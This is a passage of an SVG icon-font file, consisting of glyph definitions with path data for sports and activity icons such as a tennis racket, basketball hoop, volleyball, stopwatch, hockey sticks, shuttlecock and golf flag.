<glyph unicode="&#xea92;" glyph-name="tennis-racket" d="M416 800h32v32h-25.751c-2.12-2.845-4.203-5.768-6.249-8.768v-23.232zM416 736h32v32h-32v-32zM384 736v26.574c-3.479-8.58-6.713-17.451-9.681-26.574h9.681zM416 672h32v32h-32v-32zM384 672v32h-18.739c-2.533-10.437-4.731-21.12-6.569-32h25.308zM416 512v-32h32v32h-32zM384 512h-18.591c4.977-12.805 11.234-24.175 18.591-34.199v0 34.199zM416 576v-32h32v32h-32zM384 576h-31.565c0.63-11.347 1.937-22.005 3.869-32v0h27.696v32zM416 640v-32h32v32h-32zM384 640h-29.604c-1.055-10.547-1.772-21.227-2.13-32v0h31.734v32zM480 800h32v32h-32v-32zM480 883.763v-19.763h32v30.662c-10.967-1.839-21.668-5.54-32-10.9zM480 736h32v32h-32v-32zM480 672h32v32h-32v-32zM480 512v-32h32v32h-32zM448 429.686v18.314h-33.943c10.368-7.489 21.755-13.557 33.943-18.314zM480 420.464c10.332-2.047 21.033-3.365 32-4.005v31.541h-32v-27.536zM480 576v-32h32v32h-32zM480 640v-32h32v32h-32zM608 832v-32h32v23.232c-2.045 3-4.129 5.923-6.249 8.768h-25.751zM544 832v-32h32v32h-32zM544 864h32v19.763c-10.332 5.36-21.033 9.061-32 10.9v-30.662zM608 768v-32h32v32h-32zM544 768v-32h32v32h-32zM608 704v-32h32v32h-32zM690.739 704h-18.739v-32h25.308c-1.838 10.88-4.036 21.563-6.569 32zM681.681 736c-2.968 9.123-6.202 17.994-9.681 26.574v-26.574h9.681zM544 704v-32h32v32h-32zM608 480h32v32h-32v-32zM608 448v-18.314c12.188 4.757 23.575 10.825 33.943 18.314h-33.943zM544 480h32v32h-32v-32zM544 448v-31.541c10.967 0.64 21.668 1.958 32 4.005v0 27.536h-32zM608 544h32v32h-32v-32zM699.696 544c1.932 9.995 3.239 20.653 3.869 32v0h-31.565v-32h27.696zM690.591 512h-18.591v-34.199c7.357 10.024 13.614 21.394 18.591 34.199zM544 544h32v32h-32v-32zM608 608h32v32h-32v-32zM703.734 608c-0.358 10.773-1.075 21.453-2.13 32v0h-29.604v-32h31.734zM544 608h32v32h-32v-32zM735.635 576c-6.114-131.614-88.327-186.581-191.635-191.616v-163.098c18.723-6.59 32-24.445 32-45.437v-159.697c0-26.766-21.49-48.152-48-48.152-26.694 0-48 21.558-48 48.152v159.697c0 21.101 13.357 38.859 32 45.43v0 163.106c-103.308 5.035-185.521 60.002-191.635 191.616h-0.365v32h0.24c5.256 175.133 96.263 320 207.76 320s202.504-144.867 207.76-320h0.24v-32h-0.365zM528 192c-8.837 0-16-7.292-16-15.712v-160.576c0-8.678 7.422-15.712 16-15.712 8.837 0 16 7.292 16 15.712v160.576c0 8.678-7.422 15.712-16 15.712v0 0z" />
<glyph unicode="&#xea93;" glyph-name="tennis-racket2" d="M416 800h32v32h-25.751c-2.12-2.845-4.203-5.768-6.249-8.768v-23.232zM416 736h32v32h-32v-32zM384 736v26.574c-3.479-8.58-6.713-17.451-9.681-26.574h9.681zM416 672h32v32h-32v-32zM384 672v32h-18.739c-2.533-10.437-4.731-21.12-6.569-32h25.308zM416 512v-32h32v32h-32zM384 512h-18.591c4.977-12.805 11.234-24.175 18.591-34.199v0 34.199zM416 576v-32h32v32h-32zM384 576h-31.565c0.63-11.347 1.937-22.005 3.869-32v0h27.696v32zM416 640v-32h32v32h-32zM384 640h-29.604c-1.055-10.547-1.772-21.227-2.13-32v0h31.734v32zM480 800h32v32h-32v-32zM480 883.763v-19.763h32v30.662c-10.967-1.839-21.668-5.54-32-10.9zM480 736h32v32h-32v-32zM480 672h32v32h-32v-32zM480 512v-32h32v32h-32zM448 429.686v18.314h-33.943c10.368-7.489 21.755-13.557 33.943-18.314zM480 420.464c10.332-2.047 21.033-3.365 32-4.005v31.541h-32v-27.536zM480 576v-32h32v32h-32zM480 640v-32h32v32h-32zM608 832v-32h32v23.232c-2.045 3-4.129 5.923-6.249 8.768h-25.751zM544 832v-32h32v32h-32zM544 864h32v19.763c-10.332 5.36-21.033 9.061-32 10.9v-30.662zM608 768v-32h32v32h-32zM544 768v-32h32v32h-32zM608 704v-32h32v32h-32zM690.739 704h-18.739v-32h25.308c-1.838 10.88-4.036 21.563-6.569 32zM681.681 736c-2.968 9.123-6.202 17.994-9.681 26.574v-26.574h9.681zM544 704v-32h32v32h-32zM608 480h32v32h-32v-32zM608 448v-18.314c12.188 4.757 23.575 10.825 33.943 18.314v0h-33.943zM544 480h32v32h-32v-32zM544 448v-31.541c10.967 0.64 21.668 1.958 32 4.005v0 27.536h-32zM608 544h32v32h-32v-32zM699.696 544c1.932 9.995 3.239 20.653 3.869 32v0h-31.565v-32h27.696zM690.591 512h-18.591v-34.199c7.357 10.024 13.614 21.394 18.591 34.199zM544 544h32v32h-32v-32zM608 608h32v32h-32v-32zM703.734 608c-0.358 10.773-1.075 21.453-2.13 32v0h-29.604v-32h31.734zM544 608h32v32h-32v-32zM735.635 576c-6.114-131.614-88.327-186.581-191.635-191.616v-163.098c18.723-6.59 32-24.445 32-45.437v-159.697c0-26.766-21.49-48.152-48-48.152-26.694 0-48 21.558-48 48.152v159.697c0 21.101 13.357 38.859 32 45.43v0 163.106c-103.308 5.035-185.521 60.002-191.635 191.616h-0.365v32h0.24c5.256 175.133 96.263 320 207.76 320s202.504-144.867 207.76-320h0.24v-32h-0.365z" />
<glyph unicode="&#xea94;" glyph-name="basketball-hoop" d="M408.759 309.081v0c12.105-5.946 28.108-10.939 46.785-14.571l-6.163 33.896c-20.248 4.603-38.272 10.929-53.14 18.554l12.518-37.879zM420.837 272.534l12.091-36.586c10.337-3.031 21.989-5.576 34.633-7.528l-6.090 33.493c-14.633 2.718-28.281 6.305-40.634 10.621v0zM512 288.293v32.033c-10.133 0.415-20.019 1.221-29.583 2.383v0l5.976-32.871c7.629-0.726 15.517-1.247 23.607-1.546v0zM512 256.326v0c-5.999 0.246-11.911 0.628-17.721 1.141l5.922-32.573c3.879-0.253 7.815-0.454 11.799-0.601v32.033zM544 256.326v-32.033c3.984 0.147 7.919 0.348 11.799 0.601l5.922 32.573c-5.81-0.512-11.722-0.895-17.721-1.141v0zM544 288.293v0c8.090 0.298 15.978 0.82 23.607 1.546l5.976 32.871c-9.565-1.163-19.45-1.968-29.583-2.383v-32.033zM635.038 272.49v0c-12.319-4.296-25.925-7.869-40.509-10.577l-6.090-33.493c12.578 1.941 24.173 4.47 34.47 7.48l12.128 36.59zM647.153 309.038l12.562 37.899c-14.86-7.615-32.867-13.933-53.096-18.531l-6.163-33.896c18.631 3.623 34.602 8.601 46.696 14.528v0zM478.768 166.775l-5.298 29.139c-10.17 1.505-19.934 3.42-29.196 5.701l3.556-10.761h0.22c0.861-9.779 12.69-18.441 30.718-24.078zM511.882 160.65c0.039-0.003 0.079-0.006 0.118-0.010v0 31.686c-1.986 0.081-3.963 0.178-5.93 0.289l5.812-31.965zM544 192.326v-31.686c0.039 0.003 0.079 0.006 0.118 0.010v0l5.812 31.965c-1.967-0.111-3.944-0.207-5.93-0.289v0 0zM611.529 201.566v0 0c-9.204-2.26-18.901-4.158-29-5.652l-5.298-29.139c18.027 5.638 29.857 14.3 30.718 24.078h0.029l3.551 10.713zM356.611 381.728v0c-0.387 0.753-0.751 1.511-1.091 2.272h-67.521v288h480v-288h-67.521c-0.32-0.716-0.661-1.429-1.022-2.138l-18.814-61.862h151.356v416h-608v-416h151.498l-18.887 61.728zM355.521 416v0 0c16.307 36.516 87.332 64 172.479 64s156.172-27.484 172.479-64h35.521v224h-416v-224h35.521zM416.471 186.088l-31.182 101.912h-193.29v480h672v-480h-193.088l-31.416-103.301h-0.217c-6.341-31.908-53.744-56.699-111.279-56.699-58.368 0-106.308 25.513-111.529 58.088v0 0zM528 352c79.529 0 144 21.49 144 48s-64.471 48-144 48c-79.529 0-144-21.49-144-48s64.471-48 144-48v0z" />
<glyph unicode="&#xea95;" glyph-name="basketball-hoop2" d="M356.611 381.728v0c-0.387 0.753-0.751 1.511-1.091 2.272h-67.521v288h480v-288h-67.521c-0.32-0.716-0.661-1.429-1.022-2.138l-18.814-61.862h151.356v416h-608v-416h151.498l-18.887 61.728zM355.521 416v0 0c16.307 36.516 87.332 64 172.479 64s156.172-27.484 172.479-64h35.521v224h-416v-224h35.521zM416.471 186.088l-31.182 101.912h-193.29v480h672v-480h-193.088l-31.416-103.301h-0.217c-6.341-31.908-53.744-56.699-111.279-56.699-58.368 0-106.308 25.513-111.529 58.088v0 0zM528 352c79.529 0 144 21.49 144 48s-64.471 48-144 48c-79.529 0-144-21.49-144-48s64.471-48 144-48v0z" />
<glyph unicode="&#xea96;" glyph-name="table-tennis" d="M271 448h419.2c11.4 28.9 16.8 61.2 14.3 95.3l-2.4 33.4c-7.4 105.7-99.7 191.3-205.7 191.3h-31.7c-106.1 0-198.3-85.8-205.8-191.3l-2.4-33.4c-2.4-34.1 2.9-66.4 14.5-95.3zM287.3 416c36.2-58 100.8-96 177.1-96h32.3c76.2 0 140.8 38 177.1 96h-386.5zM562.3 127.9c1-17.6-14.2-31.9-32-31.9h-96c-18.1 0-32.9 14.3-32 31.9l9.2 165.6c-114.2 24.5-194.7 127-187 249.7l2.1 32.9c7.7 124 114.2 223.9 237.8 223.9h32.3c123.8 0 230.1-100.2 237.8-223.8l2.1-32.9c7.6-122.3-72.2-224.5-185.8-249.4l11.5-166zM443.3 288.9c-4-72.8-8.9-160.9-9-160.9h96c-0.3 0-6.3 88.1-11.3 161-7.4-0.6-14.9-1-22.5-1h-31.9c-7.2 0-14.3 0.3-21.3 0.9v0zM832.6 272c0 35.3-28.7 64-64 64s-64-28.7-64-64 28.7-64 64-64 64 28.7 64 64v0zM736.6 272c0 17.7 14.3 32 32 32s32-14.3 32-32-14.3-32-32-32-32 14.3-32 32v0z" />
<glyph unicode="&#xea97;" glyph-name="table-tennis2" d="M236.983 448c-10.048 29.432-14.583 61.579-12.478 95.25l2.058 32.924c7.743 123.892 114.205 223.826 237.828 223.826h32.322c123.8 0 230.102-100.21 237.828-223.826l2.058-32.924c2.104-33.672-2.426-65.819-12.468-95.25h-487.147zM250.605 416c39.453-76.501 119.118-128 214.018-128h31.859c94.94 0 174.594 51.495 214.034 128h-459.91zM551.25 262.32l9.302-134.399c0.98-17.639-14.161-31.921-32-31.921h-96c-18.113 0-32.929 14.292-31.95 31.921l7.446 134.033c17.543-3.899 35.893-5.954 54.851-5.954h31.859c19.551 0 38.455 2.184 56.492 6.32v0 0zM832.552 272c0 35.346-28.654 64-64 64s-64-28.654-64-64c0-35.346 28.654-64 64-64s64 28.654 64 64v0z" />
<glyph unicode="&#xea98;" glyph-name="volleyball" d="M249.184 672.187c-3.23-127.062 35.344-255.67 117.67-363.534-45.49-33.097-95.719-58.463-148.545-75.521 1.979-3.076-11.963 19.155-19.516 34.229-24.823 49.538-38.793 105.457-38.793 164.638 0 81.975 26.804 157.69 72.125 218.859 7.468 10.079 19.296 23.923 17.059 21.329v0zM284.223 707.68v0c-4.159-3.681 9.696 8.673 21.526 17.65 34.484 26.168 73.723 46.395 116.194 59.156 8.559 2.572 21.176 5.684 18.75 5.094-10.467-109.208 10.965-222.506 68.21-325.289-31.62-52.846-71.089-98.205-116.052-135.448-85.346 111.95-120.739 247.563-108.627 378.836zM857.965 595.117c-110.631 71.089-245.737 104.699-385.010 86.61-3.972 38.212-3.715 76.53 0.586 114.271-2.682-0.398 13.436 1.905 24.377 2.79 9.921 0.803 19.954 1.212 30.082 1.212 133.138 0 249.763-70.702 314.376-176.609 6.777-11.107 16.602-30.319 15.589-28.274v0zM880.167 539.116v0c-2.039 6.712 1.915-5.602 5.164-18.787 6.971-28.296 10.669-57.881 10.669-88.329 0-18.994-1.439-37.651-4.214-55.87-1.755-11.524-5.563-28.799-4.965-26.173-95.079 79.434-216.908 127.92-350.002 129.975-30.121 54.103-49.719 111.295-59.436 169.179 148.541 19.233 292.043-23.902 402.784-109.995zM362.387 103.283v0c6.454-3.258-5.765 2.675-17.863 9.646-36.79 21.201-69.568 48.582-96.918 80.725-4.845 5.695-11.313 13.959-9.938 12.196 120.905 41.434 228.23 124.204 298.737 242.084 61.901-0.966 121.216-12.584 176.193-33.102-65.578-156.491-197.196-267.28-350.211-311.549zM408.666 83.78c146.355 53.289 270.244 165.277 334.394 318.581 49.19-21.965 94.404-51.233 134.263-86.426 1.273 3.835-2.060-6.39-5.403-15.145-52.852-138.45-186.902-236.79-343.92-236.79-38.991 0-76.566 6.064-111.833 17.3-4.459 1.421-9.43 3.14-7.502 2.48v0zM928 432c0 220.914-179.086 400-400 400s-400-179.086-400-400c0-220.914 179.086-400 400-400s400 179.086 400 400v0z" />
<glyph unicode="&#xea99;" glyph-name="volleyball2" d="M921.647 503.392c-114.984 109.544-276.406 167.453-444.264 145.719 9.717-57.884 29.315-115.076 59.436-169.179 146.035-2.255 278.508-60.409 376.964-154.009-0.548-1.996 2.817 10.478 4.68 18.855 6.244 28.077 9.537 57.265 9.537 87.222 0 15.363-0.866 30.524-2.552 45.436-1.847 16.337-5.141 33.396-3.8 25.956v0zM907.173 559.731c-118.402 94.921-273.537 142.866-434.217 121.997-5.133 49.389-3.204 98.954 5.394 147.221-1.641-0.203 5.747 0.706 11.124 1.22 12.679 1.212 25.53 1.831 38.527 1.831 167.707 0 311.309-103.209 370.752-249.577 4.615-11.363 9.774-26.715 8.42-22.693v0zM902.784 291.915c-45.661 46.011-99.735 83.659-159.724 110.446-71.067-169.833-215.45-288.96-382.471-333.749-1.897 0.875 5.394-2.492 11.025-4.886 48.039-20.425 100.893-31.726 156.386-31.726 166.396 0 309.061 101.602 369.343 246.151 2.896 6.944 6.354 16.206 5.441 13.764v0zM316.848 92.208c172.136 34.078 323.749 150.804 395.75 322.624-54.977 20.518-114.292 32.136-176.193 33.102-76.767-128.347-197.183-215.073-331.25-252.14-1.541 2.102 5.408-7.354 10.706-13.956 22.803-28.416 49.405-53.651 79.037-74.935 8.404-6.037 23.27-15.517 21.95-14.695v0zM186.327 223.9c64.531 16.456 125.941 45.037 180.527 84.753-93.136 122.027-130.275 270.603-114.24 413.455 1.123 1.066-13.75-13.446-21.745-22.311-63.942-70.901-102.868-164.803-102.868-267.797 0-69.058 17.5-134.029 48.308-190.72 4.442-8.173 11.372-19.598 10.018-17.38v0zM290.482 753.879c-26.022-145.169 6.96-299.888 102.367-425.035 44.962 37.242 84.431 82.602 116.052 135.448-63.175 113.43-82.733 239.666-63.934 359.079 1.010 0.213-5.644-1.209-9.942-2.232-45.316-10.787-87.643-29.285-125.517-54.029-9.076-5.93-21.519-15.074-19.025-13.23v0z" />
<glyph unicode="&#xea9a;" glyph-name="stop-watch" d="M247.343 607.284c48.95 44.891 110.085 76.707 177.873 89.914-25.155 20.538-41.216 51.794-41.216 86.801 0 61.856 50.144 112 112 112s112-50.144 112-112c0-35.007-16.061-66.263-41.216-86.801v0c67.788-13.208 128.924-45.023 177.873-89.914v0l39.343 39.343-22.627 22.627 22.627 22.627 67.882-67.882-22.627-22.627-22.627 22.627-39.343-39.343c60.060-65.49 96.716-152.793 96.716-248.657 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 95.864 36.656 183.167 96.716 248.657l-39.343 39.343-22.627-22.627-22.627 22.627 67.882 67.882 22.627-22.627-22.627-22.627 39.343-39.343zM516.695 379.322l99.796 99.796c6.121 6.121 16.456 6.326 22.705 0.077 6.066-6.066 6.214-16.414-0.077-22.705l-99.796-99.796c2.999-6.266 4.678-13.284 4.678-20.695 0-26.51-21.49-48-48-48-7.41 0-14.428 1.679-20.695 4.678l-35.796-35.796c-6.121-6.121-16.456-6.326-22.705-0.077-6.066 6.066-6.214 16.414 0.077 22.705l35.796 35.796c-2.999 6.266-4.678 13.284-4.678 20.695 0 26.51 21.49 48 48 48 7.41 0 14.428-1.679 20.695-4.678v0 0zM512 705.6c36.516 7.412 64 39.696 64 78.4 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-38.703 27.484-70.987 64-78.4v62.4h-32v32h96v-32h-32v-62.4zM256.52 320.072h79.857c8.668 0 15.695 7.422 15.695 16 0 8.837-6.882 16-15.695 16h-79.847c7.919 119.766 103.694 215.519 223.47 223.403v-79.78c0-8.668 7.422-15.695 16-15.695 8.837 0 16 6.882 16 15.695v79.78c119.776-7.884 215.551-103.636 223.47-223.403h-79.847c-8.668 0-15.695-7.422-15.695-16 0-8.837 6.882-16 15.695-16h79.857c-7.852-119.834-103.656-215.661-223.48-223.547v79.924c0 8.668-7.422 15.695-16 15.695-8.837 0-16-6.882-16-15.695v-79.924c-119.824 7.887-215.628 103.714-223.48 223.547zM496 0c185.568 0 336 150.432 336 336s-150.432 336-336 336c-185.568 0-336-150.432-336-336s150.432-336 336-336v0zM496 64c150.221 0 272 121.779 272 272s-121.779 272-272 272c-150.221 0-272-121.779-272-272s121.779-272 272-272v0zM496 320c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xea9b;" glyph-name="stop-watch2" d="M516.695 379.322l99.796 99.796c6.121 6.121 16.456 6.326 22.705 0.077 6.066-6.066 6.214-16.414-0.077-22.705l-99.796-99.796c2.999-6.266 4.678-13.284 4.678-20.695 0-26.51-21.49-48-48-48-7.41 0-14.428 1.679-20.695 4.678l-35.796-35.796c-6.121-6.121-16.456-6.326-22.705-0.077-6.066 6.066-6.214 16.414 0.077 22.705l35.796 35.796c-2.999 6.266-4.678 13.284-4.678 20.695 0 26.51 21.49 48 48 48 7.41 0 14.428-1.679 20.695-4.678v0 0zM767.284 584.657c60.060-65.49 96.716-152.793 96.716-248.657 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 95.864 36.656 183.167 96.716 248.657l-39.343 39.343-22.627-22.627-22.627 22.627 67.882 67.882 22.627-22.627-22.627-22.627 39.343-39.343c48.95 44.891 110.085 76.707 177.873 89.914v0c-25.155 20.538-41.216 51.794-41.216 86.801 0 61.856 50.144 112 112 112s112-50.144 112-112c0-35.007-16.061-66.263-41.216-86.801 67.788-13.208 128.924-45.023 177.873-89.914l39.343 39.343-22.627 22.627 22.627 22.627 67.882-67.882-22.627-22.627-22.627 22.627-39.343-39.343zM512 705.6c36.516 7.412 64 39.696 64 78.4 0 44.183-35.817 80-80 80s-80-35.817-80-80c0-38.703 27.484-70.987 64-78.4v62.4h-32v32h96v-32h-32v-62.4zM256.52 320.072c7.852-119.834 103.656-215.661 223.48-223.547v0 79.924c0 8.813 7.163 15.695 16 15.695 8.578 0 16-7.027 16-15.695v-79.924c119.824 7.887 215.628 103.714 223.48 223.547h-79.857c-8.813 0-15.695 7.163-15.695 16 0 8.578 7.027 16 15.695 16h79.847c-7.919 119.766-103.694 215.519-223.47 223.403v0-79.78c0-8.813-7.163-15.695-16-15.695-8.578 0-16 7.027-16 15.695v79.78c-119.776-7.884-215.551-103.636-223.47-223.403h79.847c8.813 0 15.695-7.163 15.695-16 0-8.578-7.027-16-15.695-16h-79.857zM496 64c150.221 0 272 121.779 272 272s-121.779 272-272 272c-150.221 0-272-121.779-272-272s121.779-272 272-272v0zM496 320c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xea9c;" glyph-name="stop-watch3" d="M480 445.269v178.692c0 8.687 7.163 16.039 16 16.039 8.578 0 16-7.181 16-16.039v-178.692c18.643-6.589 32-24.369 32-45.269s-13.357-38.679-32-45.269v-50.692c0-8.687-7.163-16.039-16-16.039-8.578 0-16 7.181-16 16.039v50.692c-18.643 6.589-32 24.369-32 45.269s13.357 38.679 32 45.269v0 0zM744.657 671.284l39.343 39.343-22.627 22.627 22.627 22.627 67.882-67.882-22.627-22.627-22.627 22.627-39.343-39.343c60.060-65.49 96.716-152.793 96.716-248.657 0-203.241-164.759-368-368-368s-368 164.759-368 368c0 197.88 156.182 359.282 352 367.658v64.342h-32v32h96v-32h-32v-64.342c89.56-3.831 170.829-39.673 232.657-96.374zM496 64c185.568 0 336 150.432 336 336s-150.432 336-336 336c-185.568 0-336-150.432-336-336s150.432-336 336-336v0zM496 384c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xea9d;" glyph-name="stop-watch4" d="M480 445.269v178.692c0 8.687 7.163 16.039 16 16.039 8.578 0 16-7.181 16-16.039v-178.692c18.643-6.589 32-24.369 32-45.269s-13.357-38.679-32-45.269v-50.692c0-8.687-7.163-16.039-16-16.039-8.578 0-16 7.181-16 16.039v50.692c-18.643 6.589-32 24.369-32 45.269s13.357 38.679 32 45.269v0 0zM744.657 671.284c-61.828 56.701-143.097 92.543-232.657 96.374v0 64.342h32v32h-96v-32h32v-64.342c-195.818-8.377-352-169.779-352-367.658 0-203.241 164.759-368 368-368s368 164.759 368 368c0 95.864-36.656 183.167-96.716 248.657l39.343 39.343 22.627-22.627 22.627 22.627-67.882 67.882-22.627-22.627 22.627-22.627-39.343-39.343zM496 384c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xea9e;" glyph-name="hockey-stick" d="M368 288c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0 0zM526.188 156.656c-7.675-15.451-28.473-28.564-46.093-28.564h-192.19c-17.408 0-31.905 14.312-31.905 31.967v32.067c0 17.801 14.195 31.967 31.705 31.967h160.295l247.139 492.77c8.623 17.193 29.766 24.1 47.177 15.331l24.272-12.224c17.496-8.811 24.456-30.11 15.735-47.666l-256.135-515.647zM678.87 613.044l30.554-15.568 44.24 89.063c0.927 1.867 0.227 3.996-1.47 4.85l-24.272 12.224c-1.657 0.834-3.514 0.23-4.179-1.097l-44.873-89.473zM664.524 584.44l-196.774-392.347h-19.75c0 0-160 0.147-160 0.033 0 0 0.078-32.033-0.095-32.033h192.19c5.317 0 15.096 6.093 17.434 10.8l197.658 397.924-30.664 15.624z" />
<glyph unicode="&#xea9f;" glyph-name="hockey-stick2" d="M720.5 547.9l-194.3-391.2c-7.7-15.5-28.5-28.6-46.1-28.6h-192.2c-17.4 0-31.9 14.3-31.9 32v32.1c0 17.8 14.2 32 31.7 32h160.3l184.8 368.5 87.7-44.8zM734.7 576.5l47.6 95.8c8.7 17.6 1.8 38.9-15.7 47.7l-24.3 12.2c-17.4 8.8-38.6 1.9-47.2-15.3l-48-95.7 87.6-44.7zM368 288.1c26.5 0 48 21.5 48 48s-21.5 48-48 48-48-21.5-48-48 21.5-48 48-48v0z" />
<glyph unicode="&#xeaa0;" glyph-name="hockey-sticks" d="M583.889 399.777l88.111-175.685h160.295c17.51 0 31.705-14.165 31.705-31.967v-32.067c0-17.655-14.497-31.967-31.905-31.967h-192.19c-17.621 0-38.418 13.113-46.093 28.564l-65.526 131.915 17.924 35.848 76.261-153.528c2.338-4.706 12.117-10.8 17.434-10.8h192.19c-0.173 0-0.095 32.033-0.095 32.033 0 0.114-160-0.033-160-0.033h-19.75l-86.233 171.941 17.872 35.744zM495.754 575.509l-17.872-35.744-22.406 44.676-30.664-15.624 33.687-67.818-17.924-35.848-102.898 207.153c-8.721 17.556-1.76 38.855 15.735 47.666l24.272 12.224c17.411 8.769 38.554 1.862 47.177-15.331l70.893-141.354zM441.13 613.044l-44.873 89.473c-0.665 1.327-2.522 1.931-4.179 1.097l-24.272-12.224c-1.696-0.854-2.397-2.984-1.47-4.85l44.24-89.063 30.554 15.568zM430.188 156.656c-7.675-15.451-28.473-28.564-46.093-28.564h-192.19c-17.408 0-31.905 14.312-31.905 31.967v32.067c0 17.801 14.195 31.967 31.705 31.967h160.295l247.139 492.77c8.623 17.193 29.766 24.1 47.177 15.331l24.272-12.224c17.496-8.811 24.456-30.11 15.735-47.666l-256.135-515.647zM582.87 613.044l30.554-15.568 44.24 89.063c0.927 1.867 0.227 3.996-1.47 4.85l-24.272 12.224c-1.657 0.834-3.514 0.23-4.179-1.097l-44.873-89.473zM380.604 209.747l-8.854-17.654h-19.75c0 0-160 0.147-160 0.033 0 0 0.078-32.033-0.095-32.033h192.19c5.317 0 15.096 6.093 17.434 10.8l197.658 397.924-30.664 15.624-187.92-374.693z" />
<glyph unicode="&#xeaa1;" glyph-name="hockey-sticks2" d="M627.738 554.361l-197.55-397.705c-7.675-15.451-28.473-28.564-46.093-28.564h-192.19c-17.408 0-31.905 14.312-31.905 31.967v32.067c0 17.801 14.195 31.967 31.705 31.967h160.295l188.048 374.949 87.69-44.68zM641.975 583.022l44.349 89.282c8.721 17.556 1.76 38.855-15.735 47.666l-24.272 12.224c-17.411 8.769-38.554 1.862-47.177-15.331l-44.745-89.217 87.58-44.624zM439.99 464.072l-44.622 89.833 87.692 44.681 12.112-24.151-55.182-110.363zM527.701 287.494l64.99-130.838c7.675-15.451 28.473-28.564 46.093-28.564h192.19c17.408 0 31.905 14.312 31.905 31.967v32.067c0 17.801-14.195 31.967-31.705 31.967h-160.295l-87.573 174.612-55.605-111.211zM381.131 582.566l-44.575 89.738c-8.721 17.556-1.76 38.855 15.735 47.666l24.272 12.224c17.411 8.769 38.554 1.862 47.177-15.331l44.973-89.672-87.582-44.625z" />
<glyph unicode="&#xeaa2;" glyph-name="shuttlecock" d="M385.371 90.719l60.857 517.281h99.544l60.68-515.783-110.452-84.238-110.629 82.74zM353.677 95.194l-95.773-84.473-63.037 63.936 125.133 533.344h94.007l-60.33-512.806zM638.567 93.119l-60.574 514.881h94.007l124.529-533.344-61.793-63.936-96.169 82.398zM704 608v80c0 114.875-93.125 208-208 208s-208-93.125-208-208v-80l-128-544 96-96 112 96 128-96 128 96 112-96 96 96-128 544zM320 640v48c0 97.202 78.798 176 176 176s176-78.798 176-176v-48h-352z" />
<glyph unicode="&#xeaa3;" glyph-name="shuttlecock2" d="M704 640v48c0 114.875-93.125 208-208 208s-208-93.125-208-208v-48h416zM545.772 608h-99.544l-62.326-529.767-2.683-24.147 114.781-86.086 114.781 86.086-2.672 24.045-62.338 529.869zM348.242 47.065l-92.242-79.065-96 96 128 544h126.007l-61.898-526.131-3.867-34.805zM642.175 608h62.615l127.21-544-95.408-96-91.673 79.065-3.832 34.702-61.528 526.233h62.615z" />
<glyph unicode="&#xeaa4;" glyph-name="golf" d="M384 688v-411.442c-131.677-21.93-224-73.025-224-132.558 0-79.529 164.759-144 368-144s368 64.471 368 144c0 79.529-164.759 144-368 144-39.053 0-76.685-2.38-112-6.791v0 244.505l416 178.286-448 192v-208zM416 249.627c35.031 4.127 72.729 6.373 112 6.373 185.568 0 336-50.144 336-112s-150.432-112-336-112c-185.568 0-336 50.144-336 112 0 44.678 78.483 83.246 192 101.222v-54.182c-36.516-4.447-64-23.818-64-47.040 0-26.51 35.817-48 80-48s80 21.49 80 48c0 23.222-27.484 42.592-64 47.040v58.587zM416 848l336-144-336-144v288zM656 128c26.51 0 48 14.327 48 32s-21.49 32-48 32c-26.51 0-48-14.327-48-32s21.49-32 48-32v0z" />
<glyph unicode="&#xeaa5;" glyph-name="golf2" d="M384 688v-560h32v397.714l416 178.286-448 192v-208zM448 284.588c25.756 2.234 52.526 3.412 80 3.412 203.241 0 368-64.471 368-144s-164.759-144-368-144c-203.241 0-368 64.471-368 144 0 54.583 77.608 102.072 192 126.494v-88.091c-19.431-8.757-32-22.7-32-38.404 0-26.51 35.817-48 80-48s80 21.49 80 48c0 15.704-12.569 29.646-32 38.404v102.184zM656 128c26.51 0 48 14.327 48 32s-21.49 32-48 32c-26.51 0-48-14.327-48-32s21.49-32 48-32v0z" />
<glyph unicode="&#xeaa6;" glyph-name="move" d="M575.196 255.204v0 0c36.516-7.412 64-39.696 64-78.4 0-44.183-35.817-80-80-80s-80 35.817-80 80c0 38.703 27.484 70.987 64 78.4v106.973l-256 256v-105.373h-32v160h160v-32h-105.652l265.652-267.991v-117.609zM287.196 282.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM735.196 506.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM575.196 730.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM559.196 128.804c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xeaa7;" glyph-name="move2" d="M575.196 255.204v117.609l-265.652 267.991h105.652v32h-160v-160h32v105.373l256-256v-106.973c-36.516-7.412-64-39.696-64-78.4 0-44.183 35.817-80 80-80s80 35.817 80 80c0 38.703-27.484 70.987-64 78.4v0zM287.196 282.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM735.196 506.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM575.196 730.177l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569z" />
